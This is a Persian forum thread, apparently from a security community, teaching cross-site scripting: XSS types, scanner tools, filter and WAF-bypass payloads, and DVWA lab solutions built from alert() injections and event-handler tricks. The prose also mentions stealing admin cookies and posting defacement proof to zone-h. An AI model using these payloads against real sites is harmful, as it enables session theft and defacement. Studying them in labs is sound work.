discord icon
سرور دیسکورد گاردایران

پست های پیشنهاد شده

سلام و درود.

خواستم چیزایی که در مورد باگ Xss  رو بلدم یاد بدم 😐 چون بعضی از تازه کارا زیاد راجب این باگ نمیدونن و میان به یه input  همش جاوا اسکریپت تزریق میکنن میبینن نتیجه نمیده

اگه اطلاعاتم غلط بود حتما بگین لطفا و هرکی چیزی بلده راجب این باگ کمک کنه این پست رو عالی کنیم به کمک هم 😐

خب تا یکم بعد ادامه پست رو میزارم.

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

قدم اول :

باگ xss چیست؟

XSS مخفف Cross Site Scripting هست اما بدلیل اشتباه نگرفته شدن با CSS اون را XSS میخوانند.

خب این باگ توی بیشتر سایت ها هست حتی چند وقت پیش تلگرام هم داشت nsa  هم داره و کلی سایت دیگه

تو این حمله هکر میاد کد جاوا اسکریپت رو به قسمت آسیب پذیر سایت تزریق میکنه

مثل فرم لاگین و ریجستر و جستجو اگه باگ داشته باشن.

بعد که ادمین رفته تو حسابش و کوکی های مخصوص به خودشو ذخیره کرده میاد مثلا به قسمت جستجو هکر با اون کد جاوا اسکریپت کوکی هاشو می دزده

sorted-XSS-768x442.png.eaa4af2ae28733018cf730d530eefde0.png

البته بیشتر هکرا حوصله دزدیدن کوکی ندارن و همینطوری میان تو zone-h  یا miror-h لینک اثباتشو ثبت میکنن

یه نکته هم بگم هرجا xss بود htmli  هم هست

xss چند تا مدل مختلف داره مثل:

Reflected XSS

در این حملات، پیلودهای XSS در درخواست HTTP قرار گرفته (لینک سایت) و به اپلیکیشن آسیب‌پذیر ارسال می‌شوند. اپلیکیشن از پیلود استفاده کرده و بلافاصله آن را به کاربر بازتاب می‌دهد. بنابراین تست این دسته از XSS آسان است. 

برا مثال :

<example.com/search.php?event="><script>alert(11111)</script

تو مثالی که گفتم من داخل یه سایت در قسمت جستجو سایت سورس سایت رو دیدم که یه فیلدش به نام event آسیب پذیر بود پس میام داخلش یه آلرت با جاوا اسکریپت میزارم

Persistent XSS

باگ‌های Persistent XSS به دلیل ذخیره شدن پیلود در اپلیکیشن ایجاد می‌شوند. مهاجم با یک درخواست HTTP مثلا در یک پست فروم(یا صفحه پیام‌ها یا تنظیمات اکانت)، پیلود خود را تزریق می‌کند. اپلیکیشن این ورودی را پذیرفته و آن را ذخیره می‌کند. سپس، با مراجعه یک قربانی به صفحه حاوی پیلود، اپلیکیشن اسکریپت مخرب را به عنوان بخشی از صفحه به مرورگر کاربر برمی‌گرداند. این نوع از حملات بازه وسیع‌تری از افراد را قربانی خود می‌کند

معمولا استاتیکه

اینم مثل بالاییه 😐

DOM BASED CROSS SITE SCRIPTING یا xss dom

 نوعی از حمله ی XSS است که داده ها و دستورهای مخرب با هدف تغییر و دستکاری «محیط» یا همان «environment «مربوط به DOM در مرورگر قربانی اجرا می شود. این کار به وسیله ی اسکریپت سمت کلینت و اجرای کدها و داده های غیرمنتظره صورت می پذیرد. در این روش، صفحه ی درخواست شده و پاسخ (response (در HTTP هیچ تغییری نمی کند؛ اما کد سمت کلینت در صفحه ی درخواست شده، به گونه ای مختلف اجرا می شود و این تفاوت به خاطر دستکاری نامطلوبی است که در محیط DOM رخ داده است.

مثال:

http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script

اینم مثل مثاله قبلی شد :(

قسمت دوم رو هم الان میزارم راجب ابزار هایی که باگ رو خودکار پیدا میکنن و....

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

به نام خدا

سلام لیستی از ابزار هایی برای کشف باگ xss که البته آدم دستی کار کنه خیلی بهتره

ابزار XSSer یک فریمورک اتوماتیک تحت ترمینال و گرافیکی برای کالیه 😐

برای اجرا توی ترمینال بزن:

xsser –gtk

سایتش:

https://tools.kali.org/web-applications/xsser

ابزار XSpear

مال سال 2019 هستش با روبی نوشتن 😐

62058818-ffcef780-b25c-11e9-9a35-36537efbcca7.thumb.png.ae588dc2ced91b36e93e63eb2ec9ee21.png

 

 

 

 

 

 

 

 

 

 

 

 

 

 

گیتهابش:

https://github.com/hahwul/XSpear.git

 

XSStrike

این یکی خوب و قویه 😐

68747470733a2f2f696d6167652e6962622e636f2f637075596f412f7873737472696b652d6c6f676f2e706e67.png.77484a8fe08cc1b47d752bd2c94f23b4.png

با پایتون 2 نوشتنش

اینم گیتهابش:

https://github.com/s0md3v/XSStrike

 

PwnXSS

با پایتون 3 نوشتن 

گیتهابش:

https://github.com/pwn0sec/PwnXSS

شاید تا یکم بعد روش های بایپس واف رو هم بزارم

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

سلامی دوباره

با روش های بایپس فایروال و واف میخواهم آشناتون کنم

بعضی موقع ها بعد تزریق کد جاوا اسکریپت واف یا هر فایروالی جلو اجرای کد مارو میگیره و احتمالا این صفحه بیاد 😐

12-2-1024x542.thumb.png.371cae4e61bb782cbef7115eb5e8d876.png

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

خب الان واف جلوی مارو گرفت

ما باید فایروال رو بایپس کنیم که خیلی روش داره

چند تاشو بگم.

<script>alert(1);</script>

<script>alert('XSS');</script>

<marquee><script>alert('XSS')</script></marquee>

</title><script>alert(/xss/)</script>

<scrscriptipt>alert(1)</scrscriptipt>

میتونید این تایپیکو بخونید

 

بهترین راه اینه کد جاوا اسکریپتتون رو به معادل HTML Entities تبدیل کنید

 

تو html قانونی وجود دارد که اگر بخواهید یه کاراکتر خاص را نمایش بدید باید از فرمول زیر استفاده کنید.

#&ASCII_number;

البته کد بالا برعکس افتاد 😐

دفعه بعد راجب دزدیدن کوکی احتمالا بگم

البته بگم بعضی از حرفام رو از بعضی سایت ها برداشته بودم :(( خودشون حلال کنن

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

سلامی دوباره 

میخوام این دفعه روی dvwa  کار کنیم و حل مراحلشو برا (xss) براتون بزارم.

xss (reflected)

security low

<Script>alert('666')</script>

security medium

<Script>alert('666')</script>

security is high :)

<body onload=alert('07')>

با اون روشیکه گفتم فک کنم بشه impossible رو هم رفت طولانی میشد نزاشتم 😐

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

خب الان دوباره dvwa میزارم :)

xss Dom

security is low

?default=<script>alert(/xss/)</script>

security is medium

?default=English</option></select><img src=1 onerror=alert('WUQING')>

security is high

?default=English#<script>alert(/xss/)</script>

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

الان میرم سراغ

xss stored

این یکی رو نمیدونم 😐 ولی میدونم که باید تو بخش نام کد جاوا اسکریپتتو تزریق کنی که محدودیت میاره برای تعداد کاراکترا بعد باید f12 بزنی تعداد محدودیت کاراکترا رو بیاری پایین بعد کدتو با بایپس میفرستی

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در هم اکنون، Balcon گفته است :

الان میرم سراغ

xss stored

این یکی رو نمیدونم 😐 ولی میدونم که باید تو بخش نام کد جاوا اسکریپتتو تزریق کنی که محدودیت میاره برای تعداد کاراکترا بعد باید f12 بزنی تعداد محدودیت کاراکترا رو بیاری پایین بعد کدتو با بایپس میفرستی

 

اشتباه شد منظورم اینه تعداد کاراکتر های مجاز رو میبری بالا

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری